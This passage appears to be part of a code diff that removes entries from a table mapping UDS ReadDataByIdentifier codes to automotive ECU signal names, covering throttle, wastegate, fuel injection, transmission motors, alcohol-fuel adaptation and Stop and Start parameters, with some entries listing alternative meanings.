-UDS_RDBI.dataIdentifiers[0x246f] = "Throttle valve voltage command" -UDS_RDBI.dataIdentifiers[0x2470] = "init pack current" -UDS_RDBI.dataIdentifiers[0x2471] = "NumOfModules" -UDS_RDBI.dataIdentifiers[0x2472] = "T Temperature" -UDS_RDBI.dataIdentifiers[0x2473] = "U MaxModVoltage" -UDS_RDBI.dataIdentifiers[0x2474] = "U MinModVoltage" -UDS_RDBI.dataIdentifiers[0x2475] = "U Voltage" -UDS_RDBI.dataIdentifiers[0x2476] = "VeAPIC b SOCreset anz" -UDS_RDBI.dataIdentifiers[0x2477] = "VeAPIC Output14" -UDS_RDBI.dataIdentifiers[0x2478] = "VeAPIC Output15" -UDS_RDBI.dataIdentifiers[0x2479] = "VeAPIC Output20" -UDS_RDBI.dataIdentifiers[0x2480] = "2481 24A0" # or VeAPIC Output16 -UDS_RDBI.dataIdentifiers[0x2481] = "VeAPIC Output17" -UDS_RDBI.dataIdentifiers[0x2482] = "VeAPIC Output18" -UDS_RDBI.dataIdentifiers[0x2483] = "VeAPIC Output19" -UDS_RDBI.dataIdentifiers[0x2484] = "VeAPIC Output7" -UDS_RDBI.dataIdentifiers[0x2485] = "VeAPIC Output8" -UDS_RDBI.dataIdentifiers[0x2489] = "Oil dilution rate" -UDS_RDBI.dataIdentifiers[0x2491] = "VeAPIC Pct HB SOCahr" -UDS_RDBI.dataIdentifiers[0x2492] = "VeAPIC Pct HB SOCvolt" -UDS_RDBI.dataIdentifiers[0x2493] = "VeAPIC t BSEofftime" # or Result of the catalyst diagnostic after sales routine -UDS_RDBI.dataIdentifiers[0x2494] = "VeAPIC b BSEofftimeVld" # or Result of the catalyst exhaust gas upstream oxygen sensor diagnostic after sales routine -UDS_RDBI.dataIdentifiers[0x2495] = "MAZ neu" -UDS_RDBI.dataIdentifiers[0x2496] = "MAZ neuVld" -UDS_RDBI.dataIdentifiers[0x2497] = "Timestamp" -UDS_RDBI.dataIdentifiers[0x2498] = "Timestamp valid" -UDS_RDBI.dataIdentifiers[0x24a0] = "24A0 24C0" -UDS_RDBI.dataIdentifiers[0x24bf] = "Turbo water cooling pump command" -UDS_RDBI.dataIdentifiers[0x24c0] = "24C1 24E0" -UDS_RDBI.dataIdentifiers[0x24c1] = "Time expected to switch on the heating of the downstream sensor" -UDS_RDBI.dataIdentifiers[0x24c3] = "Slow adaptative term of the wastegate control" -UDS_RDBI.dataIdentifiers[0x24c4] = "Time expected to switch on the heating of the upstream sensor" -UDS_RDBI.dataIdentifiers[0x24c5] = "Variable table for throttle area curve" -UDS_RDBI.dataIdentifiers[0x24c9] = "Limp home position of the inlet throttle" -UDS_RDBI.dataIdentifiers[0x24d7] = "Manifold pressure value from model" -UDS_RDBI.dataIdentifiers[0x24dd] = "Variable table for throttle area curve 01" -UDS_RDBI.dataIdentifiers[0x24e0] = "24E1 24FF" -UDS_RDBI.dataIdentifiers[0x24e1] = "Manifold pressure from sensor" -UDS_RDBI.dataIdentifiers[0x24e5] = "Boost pressure PWM command gasoline" -UDS_RDBI.dataIdentifiers[0x2500] = "2501 2520" -UDS_RDBI.dataIdentifiers[0x2501] = "End of the first learning phase after first key on" -UDS_RDBI.dataIdentifiers[0x2502] = "Offset Deviation detected failure local counter" -UDS_RDBI.dataIdentifiers[0x2503] = "Request to relearn on next power latch phase" -UDS_RDBI.dataIdentifiers[0x2504] = "Springs check detected failure local counter" -UDS_RDBI.dataIdentifiers[0x2505] = "First Offset detected failure local counter" -UDS_RDBI.dataIdentifiers[0x2506] = "Progress in the heater strategy" -UDS_RDBI.dataIdentifiers[0x2507] = "Heater strategy indicator" -UDS_RDBI.dataIdentifiers[0x2514] = "PWM value for the sensor heater" -UDS_RDBI.dataIdentifiers[0x2515] = "Sensor internal temperature" -UDS_RDBI.dataIdentifiers[0x2516] = "Counter of correction application since beginning engine life or since after sale resetting" -UDS_RDBI.dataIdentifiers[0x2517] = "Correction curve for computing PCtl corrected by ATOL" -UDS_RDBI.dataIdentifiers[0x2518] = "Vector counter of learning points indexed by RCO" -UDS_RDBI.dataIdentifiers[0x2519] = "Exhaust gaz oxygen concentration" -UDS_RDBI.dataIdentifiers[0x251a] = "Upstream lambda sensor is heated" -UDS_RDBI.dataIdentifiers[0x251b] = "Mean value of internal upstream proportional sensor temperature in a window" -UDS_RDBI.dataIdentifiers[0x251d] = "Internal sensor temperature" -UDS_RDBI.dataIdentifiers[0x251e] = "Raw UEGO Air Fuel ratio measurement" -UDS_RDBI.dataIdentifiers[0x251f] = "Vehicle speed threshold detected" -UDS_RDBI.dataIdentifiers[0x2520] = "2540 2560" -UDS_RDBI.dataIdentifiers[0x2524] = "Pwm command for inlet throttle" -UDS_RDBI.dataIdentifiers[0x2529] = "Positive deviation diagnostic criteria" -UDS_RDBI.dataIdentifiers[0x252a] = "Negative deviation diagnostic criteria" -UDS_RDBI.dataIdentifiers[0x252d] = "Flag indicating a frozen signal from the exhaust manifold pressure sensor" -UDS_RDBI.dataIdentifiers[0x252f] = "Logic indicating if offset learning has done at least once" -UDS_RDBI.dataIdentifiers[0x2532] = "Turbocharger Compressor ByPass Valve command status" -UDS_RDBI.dataIdentifiers[0x2533] = "Command of manifold pressure calculated by the torque structure" -UDS_RDBI.dataIdentifiers[0x2536] = "First value of closed thrust position of the inlet throttle" -UDS_RDBI.dataIdentifiers[0x253d] = "Corrected tyre circumference" -UDS_RDBI.dataIdentifiers[0x253e] = "Displayed vehicle speed factor" -UDS_RDBI.dataIdentifiers[0x253f] = "Displayed vehicle speed offset" -UDS_RDBI.dataIdentifiers[0x2540] = "2521 2540" -UDS_RDBI.dataIdentifiers[0x2550] = "Radiator Valve" -UDS_RDBI.dataIdentifiers[0x2551] = "Chiller Valve" -UDS_RDBI.dataIdentifiers[0x2560] = "2561 2580" -UDS_RDBI.dataIdentifiers[0x2573] = "Double loop offset" -UDS_RDBI.dataIdentifiers[0x2580] = "2581 25A0" -UDS_RDBI.dataIdentifiers[0x25a0] = "25A1 25C0" -UDS_RDBI.dataIdentifiers[0x25b1] = "Absolute time since the first ignition" -UDS_RDBI.dataIdentifiers[0x25b2] = "Drive mode switch status detection" -UDS_RDBI.dataIdentifiers[0x25b9] = "Oil pressure mesured" -UDS_RDBI.dataIdentifiers[0x25bc] = "Max blow by counter value of last start" -UDS_RDBI.dataIdentifiers[0x25bd] = "Road slope value" -UDS_RDBI.dataIdentifiers[0x25c0] = "25C1 25E0" -UDS_RDBI.dataIdentifiers[0x25c1] = "Voltage setpoint given to the H bridge" -UDS_RDBI.dataIdentifiers[0x25c2] = "Voltage supplied to the Electro motorized Wastegate sensor" -UDS_RDBI.dataIdentifiers[0x25c3] = "PWM command asked to the Hbridge" -UDS_RDBI.dataIdentifiers[0x25c4] = "Absolute position setpoint really given to the RST controller" -UDS_RDBI.dataIdentifiers[0x25c5] = "Position setpoint used by the monitoring system" -UDS_RDBI.dataIdentifiers[0x25c6] = "Electrical wastegate position relative to the closed thrust" -UDS_RDBI.dataIdentifiers[0x25c7] = "value of the last open thrust position learnt" -UDS_RDBI.dataIdentifiers[0x25c8] = "value of the first open thrust position learnt" -UDS_RDBI.dataIdentifiers[0x25c9] = "value of the open thrust position used by the regulation system" -UDS_RDBI.dataIdentifiers[0x25ca] = "value of the last closed thrust position learnt" -UDS_RDBI.dataIdentifiers[0x25cb] = "value of the first closed thrust position learnt" -UDS_RDBI.dataIdentifiers[0x25cc] = "value of the closed thrust position used by the regulation system" -UDS_RDBI.dataIdentifiers[0x25cd] = "Last measured analogic value of the Electro motorized Wastegate position" -UDS_RDBI.dataIdentifiers[0x25ce] = "Electro motorized Wastegate absolute position in percent of the sensor supply voltage" -UDS_RDBI.dataIdentifiers[0x25cf] = "Number of first offset learning failures noticed on successive driving cycles open thrust Stored in EEPROM" -UDS_RDBI.dataIdentifiers[0x25d0] = "Number of first offset learning failures noticed on successive driving cycles closed thrust Stored in EEPROM" -UDS_RDBI.dataIdentifiers[0x25d1] = "Number of dirty closed thrust failures noticed on successive driving cycles Stored in EEPROM" -UDS_RDBI.dataIdentifiers[0x25d2] = "Indicates that the first learning of the open pos has been done If 1 learning is done" -UDS_RDBI.dataIdentifiers[0x25d3] = "Indicates that the first learning of the closed pos has been done If 1 learning is done" -UDS_RDBI.dataIdentifiers[0x25d4] = "Air flap set point" -UDS_RDBI.dataIdentifiers[0x25d5] = "Catalyst diagnosis criteria" -UDS_RDBI.dataIdentifiers[0x25d6] = "Circulation request of the coolant for engine" -UDS_RDBI.dataIdentifiers[0x25d8] = "By pass activation for Air flaps command" -UDS_RDBI.dataIdentifiers[0x25d9] = "Air flaps command value" -UDS_RDBI.dataIdentifiers[0x25e0] = "25E1 2600" -UDS_RDBI.dataIdentifiers[0x2600] = "K T BattPackHighTemp Cal" # or 2601 2620 -UDS_RDBI.dataIdentifiers[0x2601] = "K T BattPackHighTempHys Cal" -UDS_RDBI.dataIdentifiers[0x2602] = "K T BattFanHighDeltaTemp Cal" -UDS_RDBI.dataIdentifiers[0x2603] = "K T BattFanHighDeltaTempHys Cal" -UDS_RDBI.dataIdentifiers[0x2620] = "2621 2640" -UDS_RDBI.dataIdentifiers[0x2800] = "EGFP Raw EGFP Raw" # or EgfAgSnsr1Volt volt, 2801 2820 -UDS_RDBI.dataIdentifiers[0x2801] = "EgfPosnCtl percSp" # or EGFP SetVal -UDS_RDBI.dataIdentifiers[0x2802] = "SCRT SCRT" -UDS_RDBI.dataIdentifiers[0x2803] = "LEGRT Raw LEGRT Raw" -UDS_RDBI.dataIdentifiers[0x2804] = "EGT" # or Transmission High Side Driver 1 Control Circuit, EGT EGT, Main injection period -UDS_RDBI.dataIdentifiers[0x2805] = "DT LEGRT LEGRT" # or Transmission High Side Driver 2 Control Circuit, LEGRT -UDS_RDBI.dataIdentifiers[0x2806] = "LEGRT OBD LEGRT OBD" -UDS_RDBI.dataIdentifiers[0x2807] = "DPFLR PDiff Raw" # or Ignition advance, LEGR PDiff Raw LEGR PDiff Raw -UDS_RDBI.dataIdentifiers[0x2808] = "Main injection advance" # or LEGR Pdiff LEGR PDiff, DPFLR Pdiff -UDS_RDBI.dataIdentifiers[0x2809] = "LEGR PDiff OBD LEGR PDiff OBD" # or Main injection quantity, DPFLR PDiff OBD -UDS_RDBI.dataIdentifiers[0x280a] = "Pre injection 1 quantity" # or ECT, ECT ECT -UDS_RDBI.dataIdentifiers[0x280b] = "AAP" # or Pre injection 2 quantity, AAP AAP -UDS_RDBI.dataIdentifiers[0x280c] = "EGP" # or EGP EGP, After injection quantity -UDS_RDBI.dataIdentifiers[0x280d] = "EGFP Trnsp EGFP Trnsp" # or Post injection quantity, EgfPosnCtl percSpDtm, Transmission Control Module Substrate Temperature -UDS_RDBI.dataIdentifiers[0x280e] = "EGFC LrndLoPosn EGFC LrndLoPosn" # or Late post injection quantity -UDS_RDBI.dataIdentifiers[0x280f] = "EGFC LrndUpPosn EGFC LrndUpPosn" -UDS_RDBI.dataIdentifiers[0x2810] = "Pre injection 1 desired time" # or Eng Trq Eng Trq, Eng Trq -UDS_RDBI.dataIdentifiers[0x2811] = "Exhaust gas flap Out" # or Pre injection 2 desired time, Pressure Control Solenoid 1 Output, EGFC Out -UDS_RDBI.dataIdentifiers[0x2812] = "TSPC Med TSPC Med" # or After injection desired time, TSPC Med, Pressure Control Solenoid 2 Output -UDS_RDBI.dataIdentifiers[0x2813] = "TSPC EngStart" # or Pressure Control Solenoid 3 Output, TSPC EngStart Mode TSPC EngStart, Post injection angle -UDS_RDBI.dataIdentifiers[0x2814] = "LEGRFP Raw LEGRFP Raw" # or Pressure Control Solenoid 4 Output, EgrfAgSnsr1Volt volt -UDS_RDBI.dataIdentifiers[0x2815] = "Klemme87 Ruckmeldeleitung Read Klemme87 Ruckmeldeleitung" # or Pressure Control Solenoid 5 Output -UDS_RDBI.dataIdentifiers[0x2817] = "Pressure Control Solenoid 1 Commanded Pressure" -UDS_RDBI.dataIdentifiers[0x2818] = "Pressure Control Solenoid 2 Commanded Pressure" -UDS_RDBI.dataIdentifiers[0x2819] = "Pressure Control Solenoid 3 Commanded Pressure" -UDS_RDBI.dataIdentifiers[0x281a] = "Pressure Control Solenoid 4 Commanded Pressure" -UDS_RDBI.dataIdentifiers[0x281b] = "Pressure Control Solenoid 5 Commanded Pressure" # or low level -UDS_RDBI.dataIdentifiers[0x281c] = "Gas pump command state" -UDS_RDBI.dataIdentifiers[0x281d] = "Transmission Pressure Switch" -UDS_RDBI.dataIdentifiers[0x281e] = "X-Valve Solenoid" -UDS_RDBI.dataIdentifiers[0x281f] = "Y-Valve Solenoid" -UDS_RDBI.dataIdentifiers[0x2820] = "2821 2840" -UDS_RDBI.dataIdentifiers[0x2822] = "TISS/TOSS Regulated Voltage Supply" # or Canister drain valve command -UDS_RDBI.dataIdentifiers[0x2824] = "Transmission Cleaning Procedure" -UDS_RDBI.dataIdentifiers[0x2826] = "Transmission Control Module Restart Sensor Temperature" -UDS_RDBI.dataIdentifiers[0x2827] = "MCPA Motor B Temperature" -UDS_RDBI.dataIdentifiers[0x2828] = "MCPB Motor A Temperature" -UDS_RDBI.dataIdentifiers[0x2829] = "MCPA Motor B Current Commanded" -UDS_RDBI.dataIdentifiers[0x282a] = "MCPB Motor A Current Commanded" -UDS_RDBI.dataIdentifiers[0x282b] = "Motor A Current Actual" -UDS_RDBI.dataIdentifiers[0x282c] = "Motor B Current Actual" -UDS_RDBI.dataIdentifiers[0x2831] = "MCPA Motor B Phase A Current" -UDS_RDBI.dataIdentifiers[0x2832] = "MCPB Motor A Phase A Current" -UDS_RDBI.dataIdentifiers[0x2835] = "MCPA Motor B Phase B Current" -UDS_RDBI.dataIdentifiers[0x2836] = "MCPB Motor A Phase B Current" -UDS_RDBI.dataIdentifiers[0x2839] = "MCPA Motor B Phase C Current" -UDS_RDBI.dataIdentifiers[0x283a] = "MCPB Motor A Phase C Current" -UDS_RDBI.dataIdentifiers[0x283f] = "MCPA Motor B Temperature Sensor A/D" # or System diagnosis criterion global deviation of richness closed loop control -UDS_RDBI.dataIdentifiers[0x2840] = "MCPB Motor A Temperature Sensor A/D" # or 2841 2860 -UDS_RDBI.dataIdentifiers[0x2841] = "MCPA Motor B Torque Commanded" -UDS_RDBI.dataIdentifiers[0x2842] = "MCPB Motor A Torque Commanded" # or Misfire counter cylinder 2 -UDS_RDBI.dataIdentifiers[0x2843] = "Misfire counter cylinder 3" # or MCPA Motor B Torque Actual -UDS_RDBI.dataIdentifiers[0x2844] = "MCPB Motor A Torque Actual" -UDS_RDBI.dataIdentifiers[0x2847] = "System Mode Commanded" -UDS_RDBI.dataIdentifiers[0x2848] = "Knock counter detection cylinder 2" # or System Mode Actual -UDS_RDBI.dataIdentifiers[0x2849] = "Knock counter detection cylinder 3" -UDS_RDBI.dataIdentifiers[0x284a] = "Transmission" -UDS_RDBI.dataIdentifiers[0x284b] = "MCPA Motor B Speed Actual" -UDS_RDBI.dataIdentifiers[0x284c] = "MCPB Motor A Speed Actual" -UDS_RDBI.dataIdentifiers[0x284d] = "Mean knock noise" # or MCPA Motor B Angle - Resolver Absolute Position -UDS_RDBI.dataIdentifiers[0x284e] = "MCPB Motor A Angle - Resolver Absolute Position" # or Richness regulation status -UDS_RDBI.dataIdentifiers[0x284f] = "MCPA Motor B Speed Sensor Position Offset" # or Richness regulation status bank -UDS_RDBI.dataIdentifiers[0x2850] = "Richness regulation correction" # or MCPB Motor A Speed Sensor Position Offset -UDS_RDBI.dataIdentifiers[0x2851] = "Transmission C1 Clutch Slip" -UDS_RDBI.dataIdentifiers[0x2852] = "Transmission C2 Clutch Slip" -UDS_RDBI.dataIdentifiers[0x2853] = "Transmission C3 Clutch Slip" -UDS_RDBI.dataIdentifiers[0x2854] = "Transmission C4 Clutch Slip" # or Injection time cylinder 1 1st injection -UDS_RDBI.dataIdentifiers[0x2855] = "Injection time cylinder 2 1st injection" # or Transmission Clutch -UDS_RDBI.dataIdentifiers[0x2856] = "Injection time cylinder 3 1st injection" -UDS_RDBI.dataIdentifiers[0x2857] = "Injection time cylinder 4 1st injection" -UDS_RDBI.dataIdentifiers[0x2858] = "Motor Control" -UDS_RDBI.dataIdentifiers[0x2859] = "Pressure Control Solenoid 6 Output" -UDS_RDBI.dataIdentifiers[0x285a] = "Opening angle cylinder 1 1st injection" # or Pressure Control Solenoid 6 Commanded Pressure -UDS_RDBI.dataIdentifiers[0x285b] = "Opening angle cylinder 2 1st injection" -UDS_RDBI.dataIdentifiers[0x285c] = "Opening angle cylinder 3 1st injection" -UDS_RDBI.dataIdentifiers[0x285d] = "Opening angle cylinder 4 1st injection" -UDS_RDBI.dataIdentifiers[0x285e] = "Maximum ignition timing correction of the slow loop for all the cylinders" -UDS_RDBI.dataIdentifiers[0x285f] = "Adaptation offset on injection time" -UDS_RDBI.dataIdentifiers[0x2860] = "2861 2880" -UDS_RDBI.dataIdentifiers[0x2861] = "Gas pump priming state" -UDS_RDBI.dataIdentifiers[0x2862] = "Gas pump priming done" -UDS_RDBI.dataIdentifiers[0x2863] = "Minimum gap compared to the initial linear" -UDS_RDBI.dataIdentifiers[0x2864] = "Maximum gap compared to the initial linear" -UDS_RDBI.dataIdentifiers[0x2865] = "Boolean for information at least one learning in the zone" -UDS_RDBI.dataIdentifiers[0x2866] = "4 of the 5 zones engine learned" -UDS_RDBI.dataIdentifiers[0x2867] = "Learning counter to adaptive least square method" -UDS_RDBI.dataIdentifiers[0x2869] = "Injection time cylinder 1 2nd injection" -UDS_RDBI.dataIdentifiers[0x286a] = "Injection time cylinder 2 2nd injection" -UDS_RDBI.dataIdentifiers[0x286b] = "Injection time cylinder 3 2nd injection" -UDS_RDBI.dataIdentifiers[0x286c] = "Injection time cylinder 4 2nd injection" -UDS_RDBI.dataIdentifiers[0x286d] = "Opening angle cylinder 1 2nd injection" -UDS_RDBI.dataIdentifiers[0x286e] = "Opening angle cylinder 2 2nd injection" -UDS_RDBI.dataIdentifiers[0x286f] = "Opening angle cylinder 3 2nd injection" -UDS_RDBI.dataIdentifiers[0x2870] = "Opening angle cylinder 4 2nd injection" -UDS_RDBI.dataIdentifiers[0x2871] = "Piloted thermostat PWM command" -UDS_RDBI.dataIdentifiers[0x2872] = "Corrective factor depending on exotic fuel quantity For injection time" -UDS_RDBI.dataIdentifiers[0x2873] = "Corrected average ALFACL for memorized fuel system diagnostic" -UDS_RDBI.dataIdentifiers[0x2874] = "Misfire counter" -UDS_RDBI.dataIdentifiers[0x2875] = "External controls denial status flag" -UDS_RDBI.dataIdentifiers[0x2876] = "4 first column of the pre control working matrix stored in EEPROM" -UDS_RDBI.dataIdentifiers[0x2877] = "4 last column of the pre control working matrix stored in EEPROM" -UDS_RDBI.dataIdentifiers[0x287b] = "Final alcohol adaptive" -UDS_RDBI.dataIdentifiers[0x287c] = "value of the counter of slow alcohol adaptive computing phases" -UDS_RDBI.dataIdentifiers[0x287d] = "Low limit of the adaptive" -UDS_RDBI.dataIdentifiers[0x287e] = "High limit of the adaptive" -UDS_RDBI.dataIdentifiers[0x287f] = "Memorized variable of the fuel level" -UDS_RDBI.dataIdentifiers[0x2880] = "2881 28A0" -UDS_RDBI.dataIdentifiers[0x2881] = "Alcohol rate for the after sell" -UDS_RDBI.dataIdentifiers[0x2884] = "Minimum level of the additional fuel tank detected" -UDS_RDBI.dataIdentifiers[0x2887] = "PWM of fuel pump actuator" -UDS_RDBI.dataIdentifiers[0x2888] = "PCU pwm feedback" -UDS_RDBI.dataIdentifiers[0x288d] = "Minimum gap compared to the initial linear Write 2" -UDS_RDBI.dataIdentifiers[0x288e] = "Maximum gap compared to the initial linear Write 2" -UDS_RDBI.dataIdentifiers[0x288f] = "Activation request of mastervac factory diagnostic sequence at first power supply of ECU" -UDS_RDBI.dataIdentifiers[0x2890] = "Mastervac pressure switch state" -UDS_RDBI.dataIdentifiers[0x2891] = "Mastervac vacuum pump activation request" -UDS_RDBI.dataIdentifiers[0x2892] = "Cumulative run time for mastervac vacuum pump" -UDS_RDBI.dataIdentifiers[0x2893] = "Mastervac pressure received on CAN" -UDS_RDBI.dataIdentifiers[0x2897] = "Turbo water pump configuration boolean" -UDS_RDBI.dataIdentifiers[0x28a0] = "28A1 28C0" -UDS_RDBI.dataIdentifiers[0x28a1] = "Cloture advance of split injection" -UDS_RDBI.dataIdentifiers[0x28a2] = "Cloture advance of main injection in regulation mode" -UDS_RDBI.dataIdentifiers[0x28a3] = "Mass to be injected on cylinder 1 on pulse 1 of injection" -UDS_RDBI.dataIdentifiers[0x28a4] = "Mass to be injected on cylinder 1 on pulse 2 of injection" -UDS_RDBI.dataIdentifiers[0x28a5] = "Mass to be injected on cylinder 2 on pulse 1 of injection" -UDS_RDBI.dataIdentifiers[0x28a6] = "Mass to be injected on cylinder 2 on pulse 2 of injection" -UDS_RDBI.dataIdentifiers[0x28a7] = "Mass to be injected on cylinder 3 on pulse 1 of injection" -UDS_RDBI.dataIdentifiers[0x28a8] = "Mass to be injected on cylinder 3 on pulse 2 of injection" -UDS_RDBI.dataIdentifiers[0x28a9] = "Mass to be injected on cylinder 4 on pulse 1 of injection" -UDS_RDBI.dataIdentifiers[0x28aa] = "Mass to be injected on cylinder 4 on pulse 2 of injection" -UDS_RDBI.dataIdentifiers[0x28ab] = "Gasoline to LPG transition" -UDS_RDBI.dataIdentifiers[0x28ac] = "Gasoline mode" -UDS_RDBI.dataIdentifiers[0x28ad] = "LPG to Gasoline transition" -UDS_RDBI.dataIdentifiers[0x28ae] = "LPG mode" -UDS_RDBI.dataIdentifiers[0x28af] = "LPG Fuel low level" -UDS_RDBI.dataIdentifiers[0x28b0] = "LPG Switch Position" -UDS_RDBI.dataIdentifiers[0x28b1] = "Gas temperature manifold level" -UDS_RDBI.dataIdentifiers[0x28b2] = "Boolean for setting to zero the two fuel mass corrections" -UDS_RDBI.dataIdentifiers[0x28b3] = "Boolean to reset to calibrated values the learned map and the learning counter" -UDS_RDBI.dataIdentifiers[0x28b4] = "First vector of open loop map for fuel injected mass correction" -UDS_RDBI.dataIdentifiers[0x28b5] = "Second vector of open loop map for fuel injected mass correction" -UDS_RDBI.dataIdentifiers[0x28b6] = "Third vector of open loop map for fuel injected mass correction" -UDS_RDBI.dataIdentifiers[0x28b7] = "Fourth vector of open loop map for fuel injected mass correction" -UDS_RDBI.dataIdentifiers[0x28b8] = "Fifth vector of open loop map for fuel injected mass correction" -UDS_RDBI.dataIdentifiers[0x28b9] = "Sixth vector of open loop map for fuel injected mass correction" -UDS_RDBI.dataIdentifiers[0x28ba] = "Seventh vector of open loop map for fuel injected mass correction" -UDS_RDBI.dataIdentifiers[0x28bb] = "Eighth vector of open loop map for fuel injected mass correction" -UDS_RDBI.dataIdentifiers[0x28bc] = "Counter of fuel injected mass correction learning events" -UDS_RDBI.dataIdentifiers[0x28bd] = "GDI Fuel Rail Pressure" -UDS_RDBI.dataIdentifiers[0x28be] = "Rail pressure setpoint" -UDS_RDBI.dataIdentifiers[0x28bf] = "Long Term Fuel Trim Bank" -UDS_RDBI.dataIdentifiers[0x28c0] = "28C1 28E0" -UDS_RDBI.dataIdentifiers[0x28c1] = "Indicator relative to vehicle acceleration for economical scoring" -UDS_RDBI.dataIdentifiers[0x28c2] = "Indicator relative to anticipation for economical scoring" -UDS_RDBI.dataIdentifiers[0x28c3] = "Indicator relative to GSI respect for economical scoring" -UDS_RDBI.dataIdentifiers[0x28c4] = "Indicator of economical monitoring" -UDS_RDBI.dataIdentifiers[0x28c5] = "A F Ratio" -UDS_RDBI.dataIdentifiers[0x28c6] = "Global injected fuel mass request" -UDS_RDBI.dataIdentifiers[0x28c7] = "air flaps PWM command Read air flaps PWM command" -UDS_RDBI.dataIdentifiers[0x28d2] = "Mux Network configuration detection EMCU Control Unit status" -UDS_RDBI.dataIdentifiers[0x28d3] = "Air flaps initialization sequence activation" -UDS_RDBI.dataIdentifiers[0x28d4] = "DMS order Normal sport" -UDS_RDBI.dataIdentifiers[0x28d6] = "RS mode request Normal sport or Race" -UDS_RDBI.dataIdentifiers[0x28d7] = "Commercial engine power display" -UDS_RDBI.dataIdentifiers[0x28d8] = "Begin high stroke sensor is activated" -UDS_RDBI.dataIdentifiers[0x28d9] = "State of the begin high of the clutch pedal 0 pedal released 1 pedal pressed" -UDS_RDBI.dataIdentifiers[0x28da] = "Wire begin high clutch contactor state" -UDS_RDBI.dataIdentifiers[0x28dd] = "After sale alternator voltage set point" -UDS_RDBI.dataIdentifiers[0x28df] = "Filtered alternator rotor current" -UDS_RDBI.dataIdentifiers[0x28e0] = "28E1 2900" -UDS_RDBI.dataIdentifiers[0x28e1] = "Alternator load" -UDS_RDBI.dataIdentifiers[0x28fc] = "Command of the drain cut valve for the EVAP diagnosis" -UDS_RDBI.dataIdentifiers[0x2900] = "2901 2920" -UDS_RDBI.dataIdentifiers[0x291b] = "Water pump water charge command state" -UDS_RDBI.dataIdentifiers[0x291c] = "ADOC configuration" -UDS_RDBI.dataIdentifiers[0x291d] = "ignition advance state" -UDS_RDBI.dataIdentifiers[0x291e] = "State counter value for each RON level" -UDS_RDBI.dataIdentifiers[0x2920] = "2921 2940" -UDS_RDBI.dataIdentifiers[0x2921] = "FAN 1 activation" -UDS_RDBI.dataIdentifiers[0x2922] = "FAN 2 activation" -UDS_RDBI.dataIdentifiers[0x2923] = "Mux Network configuration detection AIRBAG status" -UDS_RDBI.dataIdentifiers[0x2924] = "Airbag crash status" -UDS_RDBI.dataIdentifiers[0x2925] = "State of rear motor fan thermic activation request" -UDS_RDBI.dataIdentifiers[0x2926] = "Controlled rear motor fan applied command" -UDS_RDBI.dataIdentifiers[0x2927] = "Motor driven fan setpoint" -UDS_RDBI.dataIdentifiers[0x2928] = "Functionnal state of the vehicle with Stop and Start system" -UDS_RDBI.dataIdentifiers[0x2929] = "Functionnal state of the vehicle with Stop and Start system 01" -UDS_RDBI.dataIdentifiers[0x292c] = "Starter status 01" -UDS_RDBI.dataIdentifiers[0x2932] = "Median of pressures whose sensors are liable to rationality diagnosis" -UDS_RDBI.dataIdentifiers[0x2933] = "median of temperatures whose sensors are liable to rationality diagnosis" -UDS_RDBI.dataIdentifiers[0x2934] = "Boolean indicating that upstream lambda heater close loop control is enabled" -UDS_RDBI.dataIdentifiers[0x2939] = "The alcohol rate jump learning is activated" -UDS_RDBI.dataIdentifiers[0x293a] = "Total vehicle distance when the last learning process finished" -UDS_RDBI.dataIdentifiers[0x293b] = "Alcohol rate of the new fuel put into the tank" -UDS_RDBI.dataIdentifiers[0x293c] = "Percentage of the new fuel in the tank" -UDS_RDBI.dataIdentifiers[0x293d] = "Quantity of fuel consumed since last alcohol rate learning process" -UDS_RDBI.dataIdentifiers[0x293e] = "Quantity of fuel consumed since last tank fill up" -UDS_RDBI.dataIdentifiers[0x293f] = "Value of the alcohol adaptive before the tank filling" -UDS_RDBI.dataIdentifiers[0x2940] = "2941 2960" -UDS_RDBI.dataIdentifiers[0x2941] = "Boolean to indicate that there is a possible change of fuel in course" -UDS_RDBI.dataIdentifiers[0x2945] = "Drive door state" -UDS_RDBI.dataIdentifiers[0x2946] = "Drive seat state" -UDS_RDBI.dataIdentifiers[0x2947] = "Engine hood state" -UDS_RDBI.dataIdentifiers[0x2948] = "Drive seat belt reminder" -UDS_RDBI.dataIdentifiers[0x2949] = "Stop and Start status parameters" -UDS_RDBI.dataIdentifiers[0x294d] = "Warning automatic stop engine" -UDS_RDBI.dataIdentifiers[0x294e] = "Technical start request" -UDS_RDBI.dataIdentifiers[0x294f] = "Vehicle will not moving" -UDS_RDBI.dataIdentifiers[0x2951] = "Stop auto exit" -UDS_RDBI.dataIdentifiers[0x2953] = "Inhibition of Stop Start by a diag tool request" -UDS_RDBI.dataIdentifiers[0x2954] = "Vehicle whit key or keyless vehicle" -UDS_RDBI.dataIdentifiers[0x2955] = "Stop auto inhibition via automatic air conditioner" -UDS_RDBI.dataIdentifiers[0x2956] = "Begin stroke clutch pedal switch" -UDS_RDBI.dataIdentifiers[0x2958] = "state of charge" -UDS_RDBI.dataIdentifiers[0x2959] = "Automatic Start requested by driver" -UDS_RDBI.dataIdentifiers[0x2960] = "2961 2980" -UDS_RDBI.dataIdentifiers[0x2980] = "2981 29A0" -UDS_RDBI.dataIdentifiers[0x298f] = "Displaying of Stop and Start request 01" -UDS_RDBI.dataIdentifiers[0x2990] = "Maximum duration the engine can stay automatically stopped" -UDS_RDBI.dataIdentifiers[0x2991] = "Ambiant pressure high threshold below which auto stop is forbidden" -UDS_RDBI.dataIdentifiers[0x2992] = "Ambiant pressure low threshold below which auto stop is forbidden" -UDS_RDBI.dataIdentifiers[0x2993] = "Minimum speed threshold to go to StopAuto after a deactivation of 4WD function" -UDS_RDBI.dataIdentifiers[0x2994] = "Maximum delay to confirm a StopAuto request by the driver by braking pressure" -UDS_RDBI.dataIdentifiers[0x2995] = "Delay before prompting auto stop MMI" -UDS_RDBI.dataIdentifiers[0x2996] = "Maximun number of start for the high pressure pump to inhibite Stop and start" -UDS_RDBI.dataIdentifiers[0x2997] = "Maximum slope value to authorize StopAuto negative value" -UDS_RDBI.dataIdentifiers[0x2998] = "Maximum slope value to authorize StopAuto positive value" -UDS_RDBI.dataIdentifiers[0x2999] = "Delay to detect rear gear engaged" -UDS_RDBI.dataIdentifiers[0x299a] = "Maximun number of activation of starter to inhibite Stop and start" -UDS_RDBI.dataIdentifiers[0x299b] = "Maximal environment temperature inhibiting the StopAuto" -UDS_RDBI.dataIdentifiers[0x299c] = "Maximal environment temperature authorising the StopAuto" -UDS_RDBI.dataIdentifiers[0x299d] = "Minimal environment temperature inhibiting the StopAuto" -UDS_RDBI.dataIdentifiers[0x299e] = "Minimal environment temperature authorising the StopAuto" 